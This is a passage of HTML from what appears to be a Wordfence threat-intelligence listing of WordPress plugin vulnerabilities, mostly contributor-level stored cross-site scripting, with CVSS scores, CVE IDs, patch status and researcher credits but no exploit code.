				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">Newsletters</a> <span class="wfvr-software-slug">[newsletters-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ca8ab94-45b8-4705-b23b-dbc743572121" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/293abae5-a7fb-401f-af09-324a81ce8709" target="_blank" rel="noopener">Newsletters &lt;= 4.15 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;target&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12938" target="_blank" rel="noopener noreferrer">							CVE-2026-12938						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">Newsletters</a> <span class="wfvr-software-slug">[newsletters-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/293abae5-a7fb-401f-af09-324a81ce8709" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd84a7b1-76f3-4c01-a935-ffec4a48b61b" target="_blank" rel="noopener">Open User Map &lt;= 1.4.46 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66445" target="_blank" rel="noopener noreferrer">							CVE-2026-66445						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/open-user-map" target="_blank" rel="noopener">Open User Map – Interactive Leaflet Maps</a> <span class="wfvr-software-slug">[open-user-map]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c4c7257eabfabcbfa54be7eb5b7dd68c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4c7257eabfabcbfa54be7eb5b7dd68c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener">TurboNexic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd84a7b1-76f3-4c01-a935-ffec4a48b61b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02e3f64c-1076-4247-9ee5-c1105edcfb39" target="_blank" rel="noopener">Paid Memberships Pro – Content Restriction, User Registration, &amp; Paid Subscriptions &lt;= 3.8.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15016" target="_blank" rel="noopener noreferrer">							CVE-2026-15016						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paid-memberships-pro" target="_blank" rel="noopener">Paid Memberships Pro – Content Restriction, User Registration, &amp; Paid Subscriptions</a> <span class="wfvr-software-slug">[paid-memberships-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02e3f64c-1076-4247-9ee5-c1105edcfb39" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ddc7519-3ef0-449c-8190-fe0972c62703" target="_blank" rel="noopener">Photonic Gallery &amp; Lightbox for Flickr, SmugMug &amp; Others &lt;= 3.33 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66434" target="_blank" rel="noopener noreferrer">							CVE-2026-66434						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photonic" target="_blank" rel="noopener">Photonic Gallery &amp; Lightbox for Flickr, SmugMug &amp; Others</a> <span class="wfvr-software-slug">[photonic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ddc7519-3ef0-449c-8190-fe0972c62703" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b33aa60-ac20-42c3-a3ab-b29ddfe2284a" target="_blank" rel="noopener">Powerkit &lt;= 3.1.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;nav&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15645" target="_blank" rel="noopener noreferrer">							CVE-2026-15645						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/powerkit" target="_blank" rel="noopener">Powerkit – Supercharge your WordPress Site</a> <span class="wfvr-software-slug">[powerkit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b33aa60-ac20-42c3-a3ab-b29ddfe2284a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ae04e9f2-0260-44bd-9439-cabf9d00fc2c" target="_blank" rel="noopener">Powerkit &lt;= 3.1.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;style&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15644" target="_blank" rel="noopener noreferrer">							CVE-2026-15644						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/powerkit" target="_blank" rel="noopener">Powerkit – Supercharge your WordPress Site</a> <span class="wfvr-software-slug">[powerkit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ae04e9f2-0260-44bd-9439-cabf9d00fc2c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f86c6ada-112b-4b1f-b1ac-7dd4920953c8" target="_blank" rel="noopener">Powerkit &lt;= 3.1.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15649" target="_blank" rel="noopener noreferrer">							CVE-2026-15649						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/powerkit" target="_blank" rel="noopener">Powerkit – Supercharge your WordPress Site</a> <span class="wfvr-software-slug">[powerkit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f86c6ada-112b-4b1f-b1ac-7dd4920953c8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff4c217c-3a61-4f96-a698-b7fba1294ace" target="_blank" rel="noopener">RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg &lt;= 1.5.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59559" target="_blank" rel="noopener noreferrer">							CVE-2026-59559						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rt-mega-menu" target="_blank" rel="noopener">RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg</a> <span class="wfvr-software-slug">[rt-mega-menu]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/33751fc657c409bebde901e7bad75981.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33751fc657c409bebde901e7bad75981"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener">anhcd05</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff4c217c-3a61-4f96-a698-b7fba1294ace" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bae687b-5b54-4151-871e-7a9b6e56986e" target="_blank" rel="noopener">SendPulse Email Marketing Newsletter &lt;= 2.2.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via _sp_form_code Post Meta</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13362" target="_blank" rel="noopener noreferrer">							CVE-2026-13362						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sendpulse-email-marketing-newsletter" target="_blank" rel="noopener">SendPulse Email Marketing Newsletter</a> <span class="wfvr-software-slug">[sendpulse-email-marketing-newsletter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bae687b-5b54-4151-871e-7a9b6e56986e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/056884d2-d737-4ae5-b800-cb2ff31347ab" target="_blank" rel="noopener">SureForms &lt;= 2.8.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;headingWrapper&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7623" target="_blank" rel="noopener noreferrer">							CVE-2026-7623						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sureforms" target="_blank" rel="noopener">SureForms – Contact Form Builder, AI Forms, Payment Form, Survey &amp; Quiz</a> <span class="wfvr-software-slug">[sureforms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/056884d2-d737-4ae5-b800-cb2ff31347ab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/456377ec-1a73-4f9b-9fdf-0b5597e78aa5" target="_blank" rel="noopener">Ultimate Addons for Elementor &lt;= 1.45.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66688" target="_blank" rel="noopener noreferrer">							CVE-2026-66688						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-elementor" target="_blank" rel="noopener">Ultimate Addons for Elementor</a> <span class="wfvr-software-slug">[ultimate-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-hpt-vietnam-corporation" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1a5d302225f6ffcbb6f31b7b9ca2ffc4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1a5d302225f6ffcbb6f31b7b9ca2ffc4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-hpt-vietnam-corporation" target="_blank" rel="noopener">Nguyen Ba Khanh &#8211; HPT Vietnam Corporation</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/456377ec-1a73-4f9b-9fdf-0b5597e78aa5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c5c82d8d-88eb-4159-af94-3f8e257dded6" target="_blank" rel="noopener">WowStore &lt;= 4.4.24 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;currentPostId&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17162" target="_blank" rel="noopener noreferrer">							CVE-2026-17162						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-blocks" target="_blank" rel="noopener">WowStore – Store Builder &amp; Product Blocks for WooCommerce</a> <span class="wfvr-software-slug">[product-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c5c82d8d-88eb-4159-af94-3f8e257dded6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fae39bf9-8ceb-4cb1-afd1-522c885e6ef5" target="_blank" rel="noopener">WowStore &lt;= 4.4.24 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;filterMobileText&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17161" target="_blank" rel="noopener noreferrer">							CVE-2026-17161						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-blocks" target="_blank" rel="noopener">WowStore – Store Builder &amp; Product Blocks for WooCommerce</a> <span class="wfvr-software-slug">[product-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fae39bf9-8ceb-4cb1-afd1-522c885e6ef5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/588e12c4-7d68-40ac-82bc-aacc5d389dee" target="_blank" rel="noopener">WPC Badge Management for WooCommerce &lt;= 3.1.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;text&#8217; Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
